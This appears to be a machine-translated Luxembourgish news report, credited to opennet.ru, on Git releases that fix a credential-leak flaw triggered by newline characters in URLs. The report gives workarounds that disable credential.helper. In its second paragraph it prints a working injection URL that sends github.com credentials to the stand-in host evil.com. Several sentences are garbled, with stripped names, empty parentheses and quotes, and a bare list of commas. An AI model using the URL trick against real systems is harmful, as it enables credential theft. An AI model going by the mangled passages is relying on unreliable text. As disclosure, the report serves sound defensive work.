Korrekturverëffentlechungen vum verdeelte Quellekontrollsystem Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 an 2.17.4, an déi eliminéiert () am Handler"", wat verursaacht datt d'Umeldungsinformatiounen un de falsche Host geschéckt ginn wann e Git Client op e Repository zougräift mat enger speziell formatéierter URL mat engem Newline Charakter. D'Schwachheet kann benotzt ginn fir Umeldungsinformatiounen vun engem aneren Host ze arrangéieren fir op e Server geschéckt ze ginn deen vum Ugräifer kontrolléiert gëtt.
Wann Dir eng URL wéi "https://evil.com?%0ahost=github.com/" spezifizéiert, wäert den Umeldungshandler beim Uschloss un den Host evil.com d'Authentifikatiounsparameter passéieren, déi fir github.com spezifizéiert sinn. De Problem geschitt wann Dir Operatiounen ausféiert wéi "git clone", dorënner d'Veraarbechtung vun URLen fir submodules (zum Beispill, "git submodule update" veraarbecht automatesch d'URLen uginn an der .gitmodules Fichier aus dem Repository). D'Schwachheet ass am geféierlechsten a Situatiounen, wou en Entwéckler e Repository klont ouni d'URL ze gesinn, zum Beispill, wann Dir mat Submodulen schafft, oder a Systemer déi automatesch Aktiounen ausféieren, zum Beispill a Package Build Scripten.
Fir Schwächen an neie Versiounen ze blockéieren en Newline Charakter an all Wäerter duerch de Umeldungsaustauschprotokoll iwwerdroen. Fir Verdeelungen, kënnt Dir d'Verëffentlechung vu Packageupdates op de Säiten verfollegen , , , , , , .
Als Léisung fir de Problem ze blockéieren Benotzt net credential.helper wann Dir Zougang zu ëffentleche Repositories a benotzt net "git clone" am "--recurse-submodules" Modus mat onkontrolléierte Repositories. Fir de credential.helper Handler komplett auszeschalten, wat mécht an recuperéieren Passwierder aus , geschützt oder eng Datei mat Passwuert, kënnt Dir d'Befehle benotzen:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Source: opennet.ru